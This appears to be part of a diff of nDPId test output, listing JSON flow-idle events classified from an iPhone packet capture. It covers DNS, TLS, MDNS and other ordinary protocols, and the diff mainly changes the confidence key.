-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 
